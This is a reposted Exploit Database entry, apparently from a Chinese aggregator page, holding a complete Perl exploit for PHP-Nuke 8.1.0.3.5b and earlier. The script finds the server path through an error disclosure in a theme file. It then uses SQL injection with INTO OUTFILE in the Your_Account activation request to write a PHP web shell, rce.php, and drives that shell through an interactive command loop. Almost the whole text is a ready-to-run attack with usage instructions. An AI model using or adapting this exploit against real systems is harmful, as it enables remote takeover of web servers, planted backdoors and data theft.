PHP-Nuke 8.1.0.3.5b – Remote Command Execution

• Exploit Database
• 13 阅读

• 作者： yawn
  日期： 2010-07-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14319/

• # PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit
  # Author/s: Dante90 & yawn
  # Contact Us: www.unitx.net
  # Requirements: magic_quotes_gpc : off
  # Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net
  
  #	You will remember, Watson, how the dreadful business of the
  # 	Abernetty family was first brought to my notice by the depth which the
  # 	parsley had sunk into the butter upon a hot day.
  #		-- Sherlock Holmes
  
  use strict;
  use warnings;
  use LWP::UserAgent;
  use HTTP::Cookies;
  
  sub Nuke::Usage {
  	print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit\n";
  	print " ------------------------------------------------------ \n";
  	print " * USAGE: *\n";
  	print " * cd [Local Disk]:\\*\n";
  	print " * perl name_exploit.pl [host] [username] [password]*\n";
  	print " * -> REMEMBER TO ADD THE FINAL / TO THE HOSTNAME <-*\n";
  	print " ------------------------------------------------------ \n";
  	print " * Powered By Dante90 & yawn*\n";
  	print " *	 www.unitx.net*\n";
  	print " ------------------------------------------------------ \n";
  }
  
  #VARS
  system $^O eq 'MSWin32' ? 'cls' : 'clear';
  Nuke::Usage();
  my $host = shift || die;
  my $cmd;
  my $shell = "<?php echo system(\$_GET[\"cmd\"]); ?>"; # Change Here to
  Set your custom shell (for example use system() );
  my $cookies = HTTP::Cookies->new;
  my $request = LWP::UserAgent->new;
  $request->agent("Mozilla 5/0");
  $request->cookie_jar($cookies);
  #END VARS
  sub Full_Path_Disclosure() {
  	my $Get = $request->get($host.'themes/NukeNews/theme.php');
  	if ($Get->content =~ /No such file or directory in <b>(.+?)<\/b> on line/i) {
  		return $1;
  	} else {
  		return "failed";
  	}
  }
  
  print " * Getting Full Path\n";
  my $path = Full_Path_Disclosure();
  die " * Failed Path Extraction" if ($path eq "failed");
  $path =~ s/themes(\/|\\)NukeNews(\/|\\)theme.php//g;
  print " * Full Path Found: $path\n";
  if ($path =~ m/\\/) {
  	$path =~ s/\\/\\\\\\\\/g;
  }
  print " * Injecting Shell To $host\n";
  my $req2= $request->post($host."modules.php?name=Your_Account&op=activate&username=WTF",
  	{
  		check_num => "'UNION/**/SELECT 1,2,3,4,5,6,'".$shell."' FROM
  `nuke_authors` INTO OUTFILE '$path"."rce.php",
  	},
  	Referer => $host."index.php");
  print " * Injecting Successfully Completed\n";
  print " * Shell now available on $host"."rce.php\n";
  print " * Connecting to remote shell\n";
  sleep(4);
  print " * Connected.. Type \"quit\" to quit\n";
  while() {
  		print "* root\@backdoor ~\$ ";
  		$cmd = <>;
  		chomp($cmd);
  		last if $cmd eq "quit";
  		$req2 = $request->get($host."/rce.php?cmd=".$cmd);
  		print $req2->content."\n";
  }